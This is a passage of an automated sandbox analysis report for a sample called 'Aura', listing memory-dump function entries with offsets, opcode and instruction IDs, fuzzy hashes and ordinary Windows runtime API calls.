                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF31F63170C7928BC71D8F34C8643BBBBD1ABD2340F18496EE1D687391D73888068B56
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: eB
                                                                                                                                                                                                                                                    • API String ID: 0-3246501281
                                                                                                                                                                                                                                                    • Opcode ID: d234fc643cf34f131e990788b67370748e9a2949fcd5bacb75e7d281b2b4cb11
                                                                                                                                                                                                                                                    • Instruction ID: 90c3ea06982c064a0e3bffddaa11293396c71f55d8fe445c898e383a11b9c4a0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d234fc643cf34f131e990788b67370748e9a2949fcd5bacb75e7d281b2b4cb11
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9231DF7060C3908BD7398F34C8657EBBBB1AF96300F94896DC1CA5B381DB395506CB96
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: s
                                                                                                                                                                                                                                                    • API String ID: 0-453955339
                                                                                                                                                                                                                                                    • Opcode ID: a17dc4b0f29f5f9b404bef73946c92c1ddcd8b9df2cdf66f2056694c3c23ac44
                                                                                                                                                                                                                                                    • Instruction ID: 15acc6a3c80bf2e33e426aada9df871cc9eb11dbc7320abd226b1ce3a4d8280f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a17dc4b0f29f5f9b404bef73946c92c1ddcd8b9df2cdf66f2056694c3c23ac44
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7121E57170C7928BC71CCF34C86526FBBD1ABD6300F28896EE5D687391D638C8068B4A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 26be0585b5863154a1ada3a28109cfd6482920505ec00f8f0cdb4773e3318629
                                                                                                                                                                                                                                                    • Instruction ID: 61abf759c9cadcf257a693f3ee14b799edd8696e77a16ce848846ba68cf6fefd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26be0585b5863154a1ada3a28109cfd6482920505ec00f8f0cdb4773e3318629
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A22A132A0C7118BD725DF18D8806ABB3E1BFC4319F19893ED586A7385D738B8558B87
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a6c81599bf1fc021bcf0fc65e73ee2db50555a858067dd38631d90d1653f08eb
                                                                                                                                                                                                                                                    • Instruction ID: 68e5704013bb15557501bf91ff2a082cc52ba5735bc95d065c9548d78084a955
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6c81599bf1fc021bcf0fc65e73ee2db50555a858067dd38631d90d1653f08eb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53E15671E10226CBCB24CF64D8916ABB7B1FF5A314F19465ED8427B354E738AC02CB94
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 81b107d9bb1a2d9e1941e1462cd52ab4669c909d1b4daa805a2e9a076f479614
                                                                                                                                                                                                                                                    • Instruction ID: e9311dae094bf1733b1d0aea7d2779e411c23cfc233bdfe60b8c7cd348ef5974
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81b107d9bb1a2d9e1941e1462cd52ab4669c909d1b4daa805a2e9a076f479614
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA9143B1604311ABC710DF24D892B6B73B0FF91328F14891DF8859B391E7B9D905C76A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e20164083485a976f9987a595a4cf69ff1c1b16a8df36ebfeef1c5dc0fa762dc
                                                                                                                                                                                                                                                    • Instruction ID: 5c7151967bff9507dd7797c5c2d42f530f5128f49545d25f922d80f8fb09922b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e20164083485a976f9987a595a4cf69ff1c1b16a8df36ebfeef1c5dc0fa762dc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E55113B4A0C3508BD7109F28D85266BB7F2EFD2308F18492DE4D99B391E739D905C75A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 05a87800b8fe64a1213682ffcd7b3cd920df7af8cf0b63194adf3f10e9c6102a
                                                                                                                                                                                                                                                    • Instruction ID: ac4aaf9ef2867e45983ff7a9ae25f09b9656f6f0dd0720ade2da784ad1356d6e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05a87800b8fe64a1213682ffcd7b3cd920df7af8cf0b63194adf3f10e9c6102a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C95101B4A0C3508BD7109F28C85266BB7F2EFD2308F18892DE4D89B391E739C541C75A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 437213943a5d6f7bba8ab58dfeae2c69ad63b4cb29ace8fcc03a326a6a244e04
                                                                                                                                                                                                                                                    • Instruction ID: 4f692c9c50cbc654eae74ccc9224dc58b5a9b046cdd264a5c32c37c2572de626
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 437213943a5d6f7bba8ab58dfeae2c69ad63b4cb29ace8fcc03a326a6a244e04
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A615A3560C3919FC7258F39C88096B7BE0AF96314F0882BEE8D447392D635DC4AD796
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 477dd9c6162770bc73e5b88d5049b7ad5744b8a8486b04fcbe3a7d2182c8346d
                                                                                                                                                                                                                                                    • Instruction ID: 56fb3b66251f4f27547c2b9d23238da8952789ee290974d3697a2f11aacd2a15
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 477dd9c6162770bc73e5b88d5049b7ad5744b8a8486b04fcbe3a7d2182c8346d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7741C232E145254BDB19CFB8D8911BFFBF2AB9D310F1A512EC446E7341DA38AD018B98
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b6aefbff8f267baa07500557e8c01890b3537268b37c2e49d1637d7f1157a591
                                                                                                                                                                                                                                                    • Instruction ID: 07ff840f00c89fee05c80b5a58555568be596aadf3cf6fbd15384ce02e8096e0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6aefbff8f267baa07500557e8c01890b3537268b37c2e49d1637d7f1157a591
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E65149763507014FE7248F29C9C1B52BBE2EFE6304F1985ACD0959B762C7B8D802CB54
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f83626cacc7732c68ab18a552209682d8902d6c7a8a32954126ad0522ddbd671
                                                                                                                                                                                                                                                    • Instruction ID: 6761710f77d38817d46bc0a1b71ee177f124221904cd2e9cb6d64fccfdedefae
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f83626cacc7732c68ab18a552209682d8902d6c7a8a32954126ad0522ddbd671
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C12123757447418FC719CF66C8A0263BBA3AFCA25432EC04EC4968B36AC774F8868B44
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                    • Instruction ID: 5b2b74ac1a3ba5c45c454e7f1da22ae82971d98106045a86a0c66dac7f734a9c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1311E533A055D44EC3168D3C8400566BFE30EA7235F69939AF4F89B2D6D6268D8E8359
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f3e09823d0e02ffd6712e61936e7254897359c543f25d11d694a2a38905cc569
                                                                                                                                                                                                                                                    • Instruction ID: 67478a81853eec2dea72d16e4687bce84520cd468960b50aea60f26b09377acc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3e09823d0e02ffd6712e61936e7254897359c543f25d11d694a2a38905cc569
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 840192F170071197D620AE25A5C4727A2A86F9070CF48443EEC4967342DBBDFC2886AA
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b54a11bb87efbfbf342d2a2c3f144219fdb4e62799be38ffa775fb600503eca8
                                                                                                                                                                                                                                                    • Instruction ID: be3d4ae164ca6086263ea6c394f1b56c4cacc59ffcacf56fb8c71461d48c70a6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b54a11bb87efbfbf342d2a2c3f144219fdb4e62799be38ffa775fb600503eca8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C501F435D086A247CB254F388411373BB625FA7308B5D54EDC4C1AF383C61EDC068798
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 902304f499d5a184e8a82fb08a67af2d628892b930146d8a0c022a126982db98
                                                                                                                                                                                                                                                    • Instruction ID: 1fd46abd00d7749c6900e513f53550d416a0f2a30bea42f7423d10527cabea00
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 902304f499d5a184e8a82fb08a67af2d628892b930146d8a0c022a126982db98
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0C04C38A581418B9B08CF04E9954BAB776979F214B18B13ED506F3750C734DC01990C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 680e004b511eee906e3079cfc60d91f8bd874a58f69aba1e39e5ab1c21b77e04
                                                                                                                                                                                                                                                    • Instruction ID: 8ddfabdbd47d42b1c93bf9e1ab641da2c5150ae9938c0d7cb83ab9f96b1d894d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 680e004b511eee906e3079cfc60d91f8bd874a58f69aba1e39e5ab1c21b77e04
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72B00274E441548BE614CF14DD50B74F375A747105F153454D10EB7152C631E955CA0D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f5a90507de928d43dc4e33b8172c8b4ebbfc2960a3ccf639557fe3167fb9d420
                                                                                                                                                                                                                                                    • Instruction ID: 8ee52886bdf383e29db227205d642dcaefe645a769550572070308d17a5c2958
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5a90507de928d43dc4e33b8172c8b4ebbfc2960a3ccf639557fe3167fb9d420
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FB002349891008BD604CF58D550575F3759747618F157818D547B3251D655F858C91D
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 127012223-0
                                                                                                                                                                                                                                                    • Opcode ID: f24bf79f2b5759095e042ea5569965e18a7b26458abdddcaf80db88d63d8c5d6
                                                                                                                                                                                                                                                    • Instruction ID: ac1932932df9da96b2a4b770d9db1d049d3c4618086f4b3cc7bee8ddb1d8e0d7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f24bf79f2b5759095e042ea5569965e18a7b26458abdddcaf80db88d63d8c5d6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F71B172B0020E9BDF319BA48C81FEE77EA9F4B718F19055DF806A7292E7759C008752
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 000AFE70
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 000AFE9C
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 000AFEDB
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000AFEF8
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 000AFF37
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 000AFF54
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 000AFF96
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 000AFFB9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2040435927-0
                                                                                                                                                                                                                                                    • Opcode ID: 9f7ad4948132c86201e31540297ca7760bcc67212e67e5eb4ddf84e0e31b8351
                                                                                                                                                                                                                                                    • Instruction ID: 81abeca533dd2c73f11c6fd92891d6deef72f7464d7c3b540154b76a0bd8a9a6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f7ad4948132c86201e31540297ca7760bcc67212e67e5eb4ddf84e0e31b8351
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8517D7260021BAFEB209FE0CC45FBA7BA9EF42794F25443AFD14DA191DB359C118B60
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3213747228-0
                                                                                                                                                                                                                                                    • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                                    • Instruction ID: ccea9694d1795369d250f4e9c8fe45ed3bafb0bb7afb7b68329ecfba6a856de4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AB13372A00296AFDB219F68CC81BFEBBE5EF59310F148575E944AB283D6749D01C7A0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 000B0D77
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 000B0D7F
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 000B0E08
                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 000B0E33
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 000B0E88
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
